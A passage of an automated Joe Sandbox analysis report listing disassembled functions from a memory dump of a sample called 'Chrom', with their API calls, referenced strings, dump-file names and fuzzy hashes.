                                                                                                                                                        Function 0040DC55 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                        • String ID: 0$6
                                                                                                                                                        • API String ID: 2029023288-3849865405
                                                                                                                                                        • Opcode ID: 0aaec32fb9f4fe92eeae193f48d1b194cbc3028e5b72559f9307ee4a45127174
                                                                                                                                                        • Instruction ID: 965894ef64f39c048953856348d1c0b0167852fc172e3142d5b86853f7cdf95d
                                                                                                                                                        • Opcode Fuzzy Hash: 0aaec32fb9f4fe92eeae193f48d1b194cbc3028e5b72559f9307ee4a45127174
                                                                                                                                                        • Instruction Fuzzy Hash: B521F471909300ABD720DF91C845A9FB7E8FF85754F04093FFA4492290E779CA44C79A
                                                                                                                                                        Function 0040523B Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004053C0: GetLastError.KERNEL32(?,00000000,0040533E,?,?,?,00000000,00000000,?,00404787,?,?,00000060,00000000), ref: 004053D5
                                                                                                                                                        • memset.MSVCRT ref: 00405271
                                                                                                                                                        • memset.MSVCRT ref: 00405288
                                                                                                                                                        • memset.MSVCRT ref: 0040529F
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004052B4
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004052C9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$memcpy$ErrorLast
                                                                                                                                                        • String ID: 6$\
                                                                                                                                                        • API String ID: 404372293-1284684873
                                                                                                                                                        • Opcode ID: a1a63dbf3b9459c821aff241a78b06548bfbfbca43745efa68bf068cdd8b3242
                                                                                                                                                        • Instruction ID: 4d496e1acd8f7d0bb321dbc0636b4993eabad3a605fa072d2af56a88efec649e
                                                                                                                                                        • Opcode Fuzzy Hash: a1a63dbf3b9459c821aff241a78b06548bfbfbca43745efa68bf068cdd8b3242
                                                                                                                                                        • Instruction Fuzzy Hash: 7F2183B280121CBADF11AB99DC45EDF7BBCDF15344F0144A6F908E2152D2788F988F65
                                                                                                                                                        Function 0040A62B Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A647
                                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A673
                                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A688
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040A698
                                                                                                                                                        • wcscat.MSVCRT ref: 0040A6A5
                                                                                                                                                        • wcscat.MSVCRT ref: 0040A6B4
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040A6C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1331804452-0
                                                                                                                                                        • Opcode ID: b58d772f936a03b258490eb3cb21bdc86c123face1b49a42d628fdd75bcc1e61
                                                                                                                                                        • Instruction ID: 0243e103d97181127624a16127823fe836f95e320959a325dc59fd852366c67f
                                                                                                                                                        • Opcode Fuzzy Hash: b58d772f936a03b258490eb3cb21bdc86c123face1b49a42d628fdd75bcc1e61
                                                                                                                                                        • Instruction Fuzzy Hash: 08118F72900108BFEB20AF90DD45EEB777CEB01744F144076F605A2050E6359E898BBB
                                                                                                                                                        Function 004075C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00407670: FreeLibrary.KERNEL32(?,004075D1,00000000,00000000,?,0040B908,?,00000000,?), ref: 00407678
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004075FC
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00407610
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00407623
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00407637
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0040764B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: advapi32.dll
                                                                                                                                                        • API String ID: 2012295524-4050573280
                                                                                                                                                        • Opcode ID: 33e7785ff47320705234322eea76ada849e33b817e3b8b7f6a9643b06ba54316
                                                                                                                                                        • Instruction ID: b1f28a9f87d2897bb1716b12b8d83edd3b0eb137f397b03dff6d846beed85bc2
                                                                                                                                                        • Opcode Fuzzy Hash: 33e7785ff47320705234322eea76ada849e33b817e3b8b7f6a9643b06ba54316
                                                                                                                                                        • Instruction Fuzzy Hash: 13118FB0804B409EF6302F36DC0AE27BAB4DF40725F100D3FE082965E0DB79B854CA66
                                                                                                                                                        Function 0040A737 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                                                                        • String ID: %2.2X
                                                                                                                                                        • API String ID: 2521778956-791839006
                                                                                                                                                        • Opcode ID: d8de8c6d683fe6c0a5c08c0a9bf4179f23b0233aed7098f39cd8b73d3a5c30e3
                                                                                                                                                        • Instruction ID: 4776974aedcd9b8bea86e7681cb476536998a60eaa44b54f5b5777e80f521d0b
                                                                                                                                                        • Opcode Fuzzy Hash: d8de8c6d683fe6c0a5c08c0a9bf4179f23b0233aed7098f39cd8b73d3a5c30e3
                                                                                                                                                        • Instruction Fuzzy Hash: 29012872E003146AF73077159C86BBA33B8AB41B15F11803FFC54A61C2EA7CD9584A99
                                                                                                                                                        Function 0040FB6F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040FBC2
                                                                                                                                                        • <?xml version="1.0" ?>, xrefs: 0040FBBB
                                                                                                                                                        • <%s>, xrefs: 0040FBE5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$_snwprintf
                                                                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                                                                        • Opcode ID: 6f2a1b8eab8695b849e3f90b76870ba262ffa8b6eec972095743b55347378454
                                                                                                                                                        • Instruction ID: f89c52ae9f649753db215819e8a95a7ceddb9bde2180362b42a5fc979dbbd26a
                                                                                                                                                        • Opcode Fuzzy Hash: 6f2a1b8eab8695b849e3f90b76870ba262ffa8b6eec972095743b55347378454
                                                                                                                                                        • Instruction Fuzzy Hash: 66019BB1A002197AD720A759CC41FFE776CEF45748F1140BBBA08F3152D7389E598BA9
                                                                                                                                                        Function 004465D6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • wcscpy.MSVCRT ref: 004465EB
                                                                                                                                                        • wcscat.MSVCRT ref: 004465FA
                                                                                                                                                        • wcscat.MSVCRT ref: 0044660B
                                                                                                                                                        • wcscat.MSVCRT ref: 0044661A
                                                                                                                                                        • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00446634
                                                                                                                                                          • Part of subcall function 00409F85: wcslen.MSVCRT ref: 00409F8C
                                                                                                                                                          • Part of subcall function 00409F85: memcpy.MSVCRT(?,?,000000FF,?,00446651,00000000,?,?,?,00000000,?), ref: 00409FA2
                                                                                                                                                          • Part of subcall function 0040A04F: lstrcpyW.KERNEL32(?,?,00446659,?,?,?,00000000,?), ref: 0040A064
                                                                                                                                                          • Part of subcall function 0040A04F: lstrlenW.KERNEL32(?), ref: 0040A06B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                        • String ID: \StringFileInfo\
                                                                                                                                                        • API String ID: 393120378-2245444037
                                                                                                                                                        • Opcode ID: d4165d7f50266fa13a5b531a4f01ad866930043b5560520190855b71b76da5e1
                                                                                                                                                        • Instruction ID: ad7517ef6bb7be25d6ac765d434d23ce8d777cc6758ad1086d9e8c390f57c567
                                                                                                                                                        • Opcode Fuzzy Hash: d4165d7f50266fa13a5b531a4f01ad866930043b5560520190855b71b76da5e1
                                                                                                                                                        • Instruction Fuzzy Hash: F3019A72A00209A6DB50AAA1CC06DDF77ACAB05304F0105BBB954E2013EE38DB869A5A
                                                                                                                                                        Function 0040DA84 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintfwcscpy
                                                                                                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                        • API String ID: 999028693-502967061
                                                                                                                                                        • Opcode ID: 2d27ce870dcdc0356c472e238f6887c9b469fb6313562511eb920d5e3df5e042
                                                                                                                                                        • Instruction ID: 49826c5e287938e985e88a530ad471c797b7a96a0663e00b3f963554c3d6ef55
                                                                                                                                                        • Opcode Fuzzy Hash: 2d27ce870dcdc0356c472e238f6887c9b469fb6313562511eb920d5e3df5e042
                                                                                                                                                        • Instruction Fuzzy Hash: 5CE04F31F9D30071E82421D20D02B5A26608AA5B2AFB14867FD06B41E3E1BD859D5C0F
                                                                                                                                                        Function 0044632F Relevance: 10.2, APIs: 8, Instructions: 183COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memchr.MSVCRT ref: 0044636A
                                                                                                                                                        • memcpy.MSVCRT(?,0044F98C,0000000B,?,?,?,00000000,00000000,00000000), ref: 0044640E
                                                                                                                                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00446420
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00446448
                                                                                                                                                        • memcpy.MSVCRT(?,0044F98C,0000000B), ref: 0044645A
                                                                                                                                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 0044646C
                                                                                                                                                        • memcpy.MSVCRT(0044659A,?,00000008,?,?), ref: 004464BB
                                                                                                                                                        • memset.MSVCRT ref: 00446509
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memchrmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1581201632-0
                                                                                                                                                        • Opcode ID: 4d233e4afd6ff29041f3c6f611680654f4aa68e75756faee7c9936c8c726fefb
                                                                                                                                                        • Instruction ID: a6c008d970df26256353228000b1674c0094f59a7a9bfa7c7c5a6d2f045070f8
                                                                                                                                                        • Opcode Fuzzy Hash: 4d233e4afd6ff29041f3c6f611680654f4aa68e75756faee7c9936c8c726fefb
                                                                                                                                                        • Instruction Fuzzy Hash: 3A5106719002186BDF10EF64DC81EEEBBB9AF05304F05486BF555D3246E738EA44CBA5
                                                                                                                                                        Function 00404701 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.MSVCRT ref: 00404765
                                                                                                                                                          • Part of subcall function 00404683: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 004046AF
                                                                                                                                                        • memset.MSVCRT ref: 004047B1
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 004047C4
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 004047D7
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 0040481D
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00404830
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 0040485D
                                                                                                                                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00404872
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memsetstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2350177629-0
                                                                                                                                                        • Opcode ID: 85ae6cca462db74fc9d517c8532b09502b655fda8b3ede5b79185c6b0435583b
                                                                                                                                                        • Instruction ID: d0b86a8e0b1ed09a54c1958bd2773174a4505737e3a5990953cddb4a85005ec9
                                                                                                                                                        • Opcode Fuzzy Hash: 85ae6cca462db74fc9d517c8532b09502b655fda8b3ede5b79185c6b0435583b
                                                                                                                                                        • Instruction Fuzzy Hash: 4351F3B290050DBEEB41DAE8CC41FDFB7BDAB09304F014475F708E6151E6759A498BA6
                                                                                                                                                        Function 0042CD1D Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                        • API String ID: 2221118986-1606337402
                                                                                                                                                        • Opcode ID: b08f1c7c1c784f11e339bc558d21b342480e82a29914c690e576521ecfd1ee8c
                                                                                                                                                        • Instruction ID: 5991db5cdfe02a92001a53b2659b7cff3bc1ad689f245b1de322542099a0f38c
                                                                                                                                                        • Opcode Fuzzy Hash: b08f1c7c1c784f11e339bc558d21b342480e82a29914c690e576521ecfd1ee8c
                                                                                                                                                        • Instruction Fuzzy Hash: BE818D716083219FCB10CF15E48161FBBE1BF94314F95886FE88897292D378ED44CB9A
                                                                                                                                                        Function 0040C871 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7D4
                                                                                                                                                          • Part of subcall function 0040B7D1: free.MSVCRT ref: 0040B7DC
                                                                                                                                                          • Part of subcall function 00416466: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00416C27,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,004148A8,?,?,00000000), ref: 00416479
                                                                                                                                                          • Part of subcall function 0040AFF4: free.MSVCRT ref: 0040B003
                                                                                                                                                        • memset.MSVCRT ref: 0040C8E7
                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C915
                                                                                                                                                        • _wcsupr.MSVCRT ref: 0040C92F
                                                                                                                                                          • Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF2E
                                                                                                                                                          • Part of subcall function 0040AEF6: free.MSVCRT ref: 0040AF51
                                                                                                                                                          • Part of subcall function 0040AEF6: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        • memset.MSVCRT ref: 0040C97E
                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C9A9
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C9B6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4131475296-0
                                                                                                                                                        • Opcode ID: d30ab4aae847c2bab66a724a932e69195760680e6f4ba13dddd40aab1fe6d2e6
                                                                                                                                                        • Instruction ID: 00aa335d5cf85b89362f6a9aadfcc732b8efce75ac460415b761aff3ddc3b274
                                                                                                                                                        • Opcode Fuzzy Hash: d30ab4aae847c2bab66a724a932e69195760680e6f4ba13dddd40aab1fe6d2e6
                                                                                                                                                        • Instruction Fuzzy Hash: FA41EFB2D00119BBDB10EF95DC85AEFB7BCEF48304F10417AB514F6191D7749A448BA5
                                                                                                                                                        Function 0041A521 Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
